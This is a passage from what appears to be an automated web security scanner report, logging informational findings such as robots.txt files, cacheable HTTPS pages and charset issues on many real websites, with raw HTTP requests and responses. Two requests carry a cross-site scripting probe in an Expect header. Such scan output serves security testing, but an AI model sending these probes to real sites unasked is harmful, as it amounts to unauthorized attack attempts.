Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1529541469"
Last-Modified: Thu, 15 Jul 2010 18:07:59 GMT
Content-Length: 34
Connection: close
Date: Sun, 01 May 2011 23:46:43 GMT
Server: lighttpd/1.4.26

User-agent: *
Disallow: /jailbait

30.470. http://www.wwmt.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wwmt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wwmt.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:18 GMT
Server: Apache
Cache-Control: max-age=86400
Last-Modified: Sun, 01 May 2011 20:57:13 GMT
Expires: Mon, 02 May 2011 20:57:13 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 910
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /common/bc/
Disallow: /common/bc3/
Disallow: /common/gabriels/
Disallow: /common/gsa/
Disallow: /common/printer/
Disallow: /common/pluck/
Disallow: /common/tools/
Disallow: /co
...[SNIP]...

30.471. http://www.xhost.ro/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xhost.ro
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xhost.ro

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:58:08 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2010 08:46:56 GMT
ETag: "270322-3ad-484428979a000"
Accept-Ranges: bytes
Content-Length: 941
Connection: close
Content-Type: text/plain

User-Agent: wget
Disallow: /
User-Agent: sitecheck.internetseer.com
Disallow: /
User-Agent: grub-client
Disallow: /
User-Agent: NPBot
Disallow: /
User-Agent: WebReaper
Disallow: /
User-Agent
...[SNIP]...

30.472. http://www.xilisoft.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xilisoft.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xilisoft.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.14
Date: Sun, 01 May 2011 23:12:27 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 395
Last-Modified: Mon, 06 Sep 2010 10:13:59 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Allow: /webapp/pay
Disallow: /webapp/
Disallow: /webapp_data/
Disallow: /webapp_template/
Disallow: /downloads/
Disallow: /ipad-magic-pro.html
Disallow: /ipad-magic-mac-pro.html

...[SNIP]...

30.473. http://www.yeahbaby.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yeahbaby.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yeahbaby.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:02:32 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 16 Apr 2008 08:51:51 GMT
ETag: "5408c1-1b-a0be97c0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-agent: *

Disallow:



30.474. http://www.ymlp44.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ymlp44.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ymlp44.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:07 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 09:47:55 GMT
ETag: "18e3bc8-24-4a03ce31308c0"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

30.475. http://www.yorku.ca/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yorku.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yorku.ca

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 18:36:34 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Thu, 24 Aug 2006 13:52:59 GMT
ETag: "12eab2c-150-44edaf3b"
Accept-Ranges: bytes
Content-Length: 336
Via: 1.0 optera.ccs.yorku.ca
Age: 2163
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /webstats

User-agent: Slurp
Disallow: /finearts/falabel/catalogue

User-agent: *
disallow: /struther/teaching/undergrad/psyc3570p/documents/aOrganizationalPsychologyFinalGrade
...[SNIP]...

30.476. http://www.youneek.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youneek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youneek.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:34 GMT
Server: Apache
Content-Length: 176
Cache-Control: public;max-age=78082
Expires: Mon, 02 May 2011 22:01:56 GMT
Last-Modified: Sun, 01 May 2011 22:01:56 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain

# This allows robots with any user-agent to hit any part of our site and points them to our sitemap
User-agent: *
Disallow:
Sitemap: http://www.youneek.com/sitemap_index.xml

31. Cacheable HTTPS response
There are 13 instances of this issue:


31.1. https://www.crankyape.com/AJAXWebServices/geographicServices.asmx/getCountries

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /AJAXWebServices/geographicServices.asmx/getCountries

Request

POST /AJAXWebServices/geographicServices.asmx/getCountries HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/member/registration.aspx
Origin: https://www.crankyape.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD; ASP.NET_SessionId=wcvayn45psp4cd3wlkyqwt45
Content-Length: 50

{"knownCategoryValues":"","category":"selCountry"}

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 02 May 2011 01:54:19 GMT
Content-Length: 25835
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727

{"d":[{"__type":"AjaxControlToolkit.CascadingDropDownNameValue","name":"Afghanistan","value":"1","isDefaultValue":false},{"__type":"AjaxControlToolkit.CascadingDropDownNameValue","name":"Albania","val
...[SNIP]...

31.2. https://www.crankyape.com/AJAXWebServices/geographicServices.asmx/getStates

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /AJAXWebServices/geographicServices.asmx/getStates

Request

POST /AJAXWebServices/geographicServices.asmx/getStates HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/member/registration.aspx
Origin: https://www.crankyape.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD; ASP.NET_SessionId=wcvayn45psp4cd3wlkyqwt45
Content-Length: 61

{"knownCategoryValues":"selCountry:221;","category":"states"}

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 02 May 2011 01:54:22 GMT
Content-Length: 5855
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727

{"d":[{"__type":"AjaxControlToolkit.CascadingDropDownNameValue","name":"Alabama","value":"181","isDefaultValue":false},{"__type":"AjaxControlToolkit.CascadingDropDownNameValue","name":"Alaska","value"
...[SNIP]...

31.3. https://www.crankyape.com/member/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /member/

Request

GET /member/ HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD; ASP.NET_SessionId=wcvayn45psp4cd3wlkyqwt45

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 02:10:51 GMT
Content-Length: 6535
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns=
...[SNIP]...

31.4. https://www.crankyape.com/member/registration.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /member/registration.aspx

Request

GET /member/registration.aspx HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 01:53:57 GMT
Content-Length: 73292
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=udtimieu5ipjefqiu2icmf45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CrankyApe.c
...[SNIP]...

31.5. https://www.onlinemicrofiche.com/Electronicpartsfinder/dealerinfo/DealerInfo.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /Electronicpartsfinder/dealerinfo/DealerInfo.asp

Request

GET /Electronicpartsfinder/dealerinfo/DealerInfo.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: http://www.hlsm.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:29:17 GMT
Content-Length: 5101
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>HLSM Electronic Parts Finder.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family
...[SNIP]...

31.6. https://www.onlinemicrofiche.com/WPS/shoppingcart/Shoppingcart/ProcessOrder.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/Shoppingcart/ProcessOrder.asp

Request

GET /WPS/shoppingcart/Shoppingcart/ProcessOrder.asp?Type=12 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=GJJKBIKAIMAAJLOHIEDJOHHE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:22:10 GMT
Content-Length: 4256
Content-Type: text/html
Cache-control: private


<html><head><title>World of Powersports' Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-f
...[SNIP]...

31.7. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Navigation.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Navigation.asp

Request

GET /WPS/shoppingcart/checkout/Navigation.asp?Type=11 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=GJJKBIKAIMAAJLOHIEDJOHHE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:21:53 GMT
Content-Length: 10284
Content-Type: text/html
Cache-control: private

   
<html>
<head>
<title>World of Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-siz
...[SNIP]...

31.8. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Top.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Top.htm

Request

GET /WPS/shoppingcart/checkout/Top.htm HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=GJJKBIKAIMAAJLOHIEDJOHHE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:20:00 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Fri, 04 Nov 2005 16:47:10 GMT
ETag: "658d6c665fe1c51:dd2"
Content-Length: 8659

<html><head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1
...[SNIP]...

31.9. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Request

GET /WPS/shoppingcart/checkout/Viewcart.asp?expand=1019 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:39 GMT
Content-Length: 543
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=PLJKBIKAHEBHCEPODDOPNNGN; path=/
Cache-control: private


<html>
<head>
<title>World of Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border=
...[SNIP]...

31.10. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

Request

GET /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:38 GMT
Content-Length: 7841
Content-Type: text/html
Cache-control: private

   
<html>
<head>
<title>Xtreme Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript"
src="https://seal.
...[SNIP]...

31.11. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Top.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Top.htm

Request

GET /xtremepowersports/shoppingcart/CheckOut/Top.htm HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:26:58 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Thu, 28 May 2009 18:29:21 GMT
ETag: "4ce86638c2dfc91:dd2"
Content-Length: 2762

<html>
<head>
<title>Xtreme Powersports' OEM Parts Finder Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF" leftmarg
...[SNIP]...

31.12. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

Request

GET /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:21:43 GMT
Content-Length: 541
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=MGKKBIKAJLALKLHMGNHCJDNK; path=/
Cache-control: private


<html>
<head>
<title>Xtreme Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border="0
...[SNIP]...

31.13. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/Shoppingcart/ProcessOrder.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/Shoppingcart/ProcessOrder.asp

Request

GET /xtremepowersports/shoppingcart/Shoppingcart/ProcessOrder.asp?Type=12 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:49 GMT
Content-Length: 6147
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>Xtreme Powersports' Shoppingcart' Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-s
...[SNIP]...

32. Multiple content types specified
There are 2 instances of this issue:


32.1. http://www.convergedirect.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.convergedirect.com
Path:   /favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.convergedirect.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1692
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:26:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 Page | Converge
...[SNIP]...
</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex" />
...[SNIP]...

32.2. http://www.procuts.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.procuts.com
Path:   /favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.procuts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 11086
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:52 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<!--SS_BEGIN_SNIPPET(fragment1,1)-->
...[SNIP]...

33. HTML does not specify charset
There are 92 instances of this issue:


33.1. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Request

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?2,13%3B9696cce63f6aaabd%3B12fade8e939,0%3B%3B%3B4257954862,WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAOOnorS8BAAAAAAAAADY1OTczYzE2LTc0NGItMTFlMC1hMDlkLTAwMzA0OGQ2ZDJmZQA4nyoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,;ord=1304292813? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%2